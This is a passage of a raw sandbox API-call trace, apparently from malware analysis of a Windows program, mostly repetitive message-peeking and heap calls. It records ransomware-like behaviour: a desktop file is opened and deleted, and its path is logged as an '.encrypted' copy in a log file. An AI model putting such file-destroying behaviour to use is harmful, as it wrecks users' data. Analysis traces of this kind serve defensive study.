wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.973] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\v6hoz9ycop.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.973] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.974] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.974] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.974] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.974] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.974] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.975] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.975] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.975] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFilePart=0x0) returned 0x47 [0031.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x12f20160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0x7c2100 [0031.975] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\v6hoz9ycop.gif")) returned 1 [0031.977] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8cedd0, ftCreationTime.dwHighDateTime=0x1d5bdcc, ftLastAccessTime.dwLowDateTime=0x479a5890, ftLastAccessTime.dwHighDateTime=0x1d5b689, ftLastWriteTime.dwLowDateTime=0x12f20160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x173c2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="v6hoz9YcOP.gif", cAlternateFileName="V6HOZ9~1.GIF")) returned 0 [0031.977] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.977] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.977] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.978] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.978] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0031.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.979] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.979] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xb17, lpOverlapped=0x0) returned 1 [0031.979] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xb17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.979] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.979] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.encrypted.gif\r\n", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0031.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x54) returned 0x794b90 [0031.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.encrypted.gif\r\n", cchWideChar=84, lpMultiByteStr=0x794b90, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\v6hoz9YcOP.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 84 [0031.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0031.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0031.980] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x53, lpOverlapped=0x0) returned 1 [0031.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.980] CloseHandle (hObject=0x140) returned 1 [0031.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.983] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.983] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.984] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.984] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.984] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 